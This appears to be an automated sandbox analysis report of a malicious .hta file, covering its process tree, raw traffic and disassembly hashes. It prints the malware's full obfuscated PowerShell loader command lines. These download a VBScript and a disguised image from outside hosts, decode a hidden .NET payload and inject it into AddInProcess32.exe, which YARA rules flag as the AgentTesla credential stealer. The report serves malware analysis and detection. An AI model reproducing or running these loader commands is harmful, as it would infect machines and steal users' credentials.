2024-11-20 07:28:11 UTC	8192	IN	Data Raw: ad 28 26 ae c2 93 40 8b 56 be 45 31 cf d3 a3 fd ea 6d 24 4d a7 93 4a 26 df 3c b3 b8 6d d2 f5 66 20 b1 b5 50 54 10 41 36 47 20 fa 86 27 8c 6e d5 ea 64 d3 a2 c4 b0 68 8b 57 9b 38 f3 1f 71 dc 49 56 3c b1 3c 90 14 35 9d a7 03 d1 c5 f6 8f 4e 75 29 24 1a 26 f2 a5 59 b5 92 4a ec 5d 94 28 65 b0 0f 0a 48 55 1d 68 5d 0b 1c e7 9c f1 9d 16 ae 6f 10 44 d5 39 77 56 11 3c ce 49 dc cc 77 02 a2 c1 a1 b8 f0 38 f4 93 f2 6f c1 be cf 6b f5 50 05 d4 bc da 6d 3b 96 b5 2c 43 73 4a 4a 8b e0 b2 86 5b 65 aa 27 83 d7 37 b5 fa 05 6f 08 96 bc ef 0f da a1 f7 1d ac 77 59 1d 8b 31 24 95 20 83 67 70 e4 b5 e0 2e 3c 07 4a 7c 2b fe d5 a2 59 f5 09 0b 2a 44 b3 1b 88 fa 9a 99 ac 06 b2 41 3c 7e 22 d5 e9 ad be 4b 55 0b 36 95 d9 dc ac 44 7a 60 0b c2 1b 5b f5 0e bc 8a cf 45 a6 48 bc 1d 5e 4d 53 ca Data Ascii: (&@VE1m$MJ&<mf PTA6G 'ndhW8qIV<<5Nu)$&YJ](eHUh]oD9wV<Iw8okPm;,CsJJ[e'7owY1$ gp.<J\|+Y*DA<~"KU6Dz`[EH^MS
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: be a8 b2 04 2e c5 7a f3 d8 e0 6d 6b f5 d1 eb 64 57 11 f9 74 6c f3 de 80 f8 7b 60 fc 37 63 eb a1 b6 2a 43 a9 4a ee 77 0b fd 3e 3f 9f 4c ca df 4a 17 77 18 cf 87 4e cb e2 30 28 60 84 30 b2 7d bb fe 97 81 b7 37 8b 46 e4 e9 e3 88 29 2f b4 ec 6b 5a 27 9a e9 67 e8 31 fd 48 48 76 ce 1c c5 1a 35 bd 0e 08 2c b6 48 1d 4d 02 33 c4 b6 ad 97 50 4a c8 5a 9b d2 c0 9e 79 e3 1e d5 78 b3 ea 16 42 aa 59 69 15 43 2a b6 d3 b4 dd 9a bf d7 be 06 82 c8 7c 3a 45 f0 f3 2c 72 42 d4 27 6d a5 4d 10 2f f8 88 e9 c7 6c d1 8b 4b 18 65 73 ab 69 06 99 4a a7 a3 69 51 f1 f7 35 c7 6f af 5c f1 87 51 21 3f 84 92 79 b6 3c 9a cd ed 4e a1 e2 92 58 9a 59 19 57 4f e6 03 6a 0a b6 ea 03 d3 5e fd f0 36 b4 91 22 79 bb 75 01 84 92 99 57 8d b7 62 c7 f4 e9 80 1a 12 ba 18 74 ab a8 55 78 24 df b9 92 c6 e0 4f Data Ascii: .zmkdWtl{`7cCJw>?LJwN0(`0}7F)/kZ'g1HHv5,HM3PJZyxBYiC\|:E,rB'mM/lKesiJiQ5o\Q!?y<NXYWOj^6"yuWbtUx$O
2024-11-20 07:28:11 UTC	8192	IN	Data Raw: 37 ec f5 43 0a 5f 0d a3 7f fe 4a 0c f9 9a e8 e7 8c d0 07 9e 84 20 23 f3 39 f5 cf da 06 9d b5 bf 64 3e c2 a1 74 80 2f 86 b3 17 76 f4 85 11 42 49 a1 cf 6c f9 9c 32 c8 cc 36 ca ac 97 c8 17 c8 be 9c fd 30 33 96 1d 5b c6 ce 47 0a bb ba 01 bb 9a c0 ef 9e 36 e0 90 dd 28 11 c7 d3 1c 9f 56 f1 c3 e4 86 53 b9 36 9f 61 cd ff 00 4a c1 a4 86 5d 4b 2a 6d b6 62 4d aa 8f d4 75 eb 80 19 22 d5 3a 17 91 5b 68 60 bc e5 0c 53 c0 f4 57 93 cf be 6a be b4 46 46 9c a2 94 1d 77 7f 4c 56 77 3a 89 03 47 b5 42 fe 78 0a 48 fa 86 5d ae a6 8f f9 72 22 69 11 d6 42 96 14 86 20 f7 ac b9 f3 62 6b 20 9b f7 fe 99 64 69 1c 93 b4 55 73 80 59 44 cb eb 88 16 04 f2 7a f6 04 1f a8 af a8 38 0d da 86 6a 2b 57 de b1 ed 25 be 98 a9 20 95 f4 9a ed 7d 3f 23 43 eb 8a ca f2 45 26 d7 1c 83 44 9f 7c 0a 38 98 Data Ascii: 7C_J #9d>t/vBIl2603[G6(VS6aJ]K*mbMu":[h`SWjFFwLVw:GBxH]r"iB bk diUsYDz8j+W% }?#CE&D\|8

Target ID:	0
Start time:	02:27:57
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\seethebestthingswithgreatsituationshandletotheprogress.hta"
Imagebase:	0xc50000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:27:57
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:27:57
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:27:58
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:28:02
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"
Imagebase:	0xd10000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:28:03
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D39.tmp" "c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP"
Imagebase:	0xc00000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:28:07
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
Imagebase:	0xff0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:28:08
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:28:08
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	02:28:08
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Imagebase:	0xf90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:28:28
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xb20000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3345591144.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 06340FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2122943020.0000000006340000.00000010.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6340000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 62e0bc842912797f84e875639d1a45dcc11c53cdc5a25139950ced97238ad9d2
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06340FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2122943020.0000000006340000.00000010.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6340000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 62e0bc842912797f84e875639d1a45dcc11c53cdc5a25139950ced97238ad9d2
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06340FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2122943020.0000000006340000.00000010.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6340000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 62e0bc842912797f84e875639d1a45dcc11c53cdc5a25139950ced97238ad9d2
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06340FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2122943020.0000000006340000.00000010.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6340000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 62e0bc842912797f84e875639d1a45dcc11c53cdc5a25139950ced97238ad9d2
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 4176, Parent PID: 1780COMMON

Executed Functions

Function 031E4B90 Relevance: 2.0, APIs: 1, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2266846690.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_31e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b364df059d932e9270c1ee840c63d828dbc9006e38d8a7482dcf3a52a37bff3
Instruction ID: 5dfdf7d88519cdfa1be0018310b024eef0e47607e4fecea430612c18885dc063
Opcode Fuzzy Hash: 7b364df059d932e9270c1ee840c63d828dbc9006e38d8a7482dcf3a52a37bff3
Instruction Fuzzy Hash: 64222B74A00619DFDB05CF99D884A9EFBB6FF88310F258159E914AB355C736EC81CB90

Function 07A41178 Relevance: 7.9, Strings: 6, Instructions: 441COMMON

Download Yara Rule

Strings

84j, xrefs: 07A413D2
84j, xrefs: 07A412E1
84j, xrefs: 07A412D5
84j, xrefs: 07A414B7
84j, xrefs: 07A414C3
84j, xrefs: 07A413C6

Memory Dump Source

Source File: 00000001.00000002.2286814290.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j$84j$84j$84j$84j
API String ID: 0-3452507494
Opcode ID: 5eb9c928d73003c588ad6b904ce9ba8bd82aaaf139f799f81b4d3687ceb6a891
Instruction ID: 0cfa10e3f4e557b9f09d79d03c748a894b1850c3ed95434aea5b5add057f53a5
Opcode Fuzzy Hash: 5eb9c928d73003c588ad6b904ce9ba8bd82aaaf139f799f81b4d3687ceb6a891
Instruction Fuzzy Hash: ABF1E7B5B00309EFCB149B68C404B6ABBB6BFC9710F248469E9159B351DF72EC81C792

Function 07A4115D Relevance: 4.0, Strings: 3, Instructions: 242COMMON

Download Yara Rule

Strings

84j, xrefs: 07A412D5
84j, xrefs: 07A414B7
84j, xrefs: 07A413C6

Memory Dump Source

Source File: 00000001.00000002.2286814290.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j$84j
API String ID: 0-2184534136
Opcode ID: 8eb49028dec7d315b7f53f3ef03db43baccbecfa248b4c98fb16ae2871949c27
Instruction ID: 279cb2c489686e1c0dbe864105388395ea2c88bfbeeea2613434544bf71b9842
Opcode Fuzzy Hash: 8eb49028dec7d315b7f53f3ef03db43baccbecfa248b4c98fb16ae2871949c27
Instruction Fuzzy Hash: 9B91A3B4B00309DBCB14DF58C544BAABBB2BFC8710F198469E9259B350DB72ED81CB91

Function 07A404F8 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

84j, xrefs: 07A4052F
84j, xrefs: 07A40523

Memory Dump Source

Source File: 00000001.00000002.2286814290.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j
API String ID: 0-2158658770
Opcode ID: 81760ceb5bb2f459978be96572aa22ce903b8605ccd23c287fdc52ae2bd65fcd
Instruction ID: 3c2964d08f7c317157931b6975a2e58607ae1dbb50cabafbd113450f1ad2680b
Opcode Fuzzy Hash: 81760ceb5bb2f459978be96572aa22ce903b8605ccd23c287fdc52ae2bd65fcd
Instruction Fuzzy Hash: 615117B1B00315AFD7109B68881076BBBB5EFC9710F15C4AAEA55DF382CA72DD4187A2

Function 031E1A30 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON

Download Yara Rule

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 031E51A9

Memory Dump Source

Source File: 00000001.00000002.2266846690.00000000031E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_31e0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 979d1af2d6ce71515b2af2c2c644e0ca5061b23c43cf7735eafab2c0f96c5492
Instruction ID: 53b5c052417db3ac8a89293560363af6544c3b833ad460405eeff88ec3001460
Opcode Fuzzy Hash: 979d1af2d6ce71515b2af2c2c644e0ca5061b23c43cf7735eafab2c0f96c5492
Instruction Fuzzy Hash: 7B2135B5D0165AEFCB00CF99D984ADEFBF4FF48314F14812AE918A7210D375A950CBA0

Function 0317D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2266573686.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_317d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4587ba667f6c80d3916d8c88d4724447e183276aba34fb560dbfc3c9a9bc4ce1
Instruction ID: fe966fccad0be49a1b29c0e846263f8685d5d4359d3e898eb4b3f70ee39a5519
Opcode Fuzzy Hash: 4587ba667f6c80d3916d8c88d4724447e183276aba34fb560dbfc3c9a9bc4ce1
Instruction Fuzzy Hash: 7D01F2714043489BE7148A25ED80B67FFA8DF89334F1CD05AEE490A242CBB89881C7B1

Function 0317D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2266573686.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_317d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0bcb9343d6f71cf9e63240c1b613e9a589f4db4b9b53a4f26a0e527e0d2b836
Instruction ID: 515ce6a5be323abb7fc7ce0d95fe72bb39a933b519663bf507927ac07daa3775
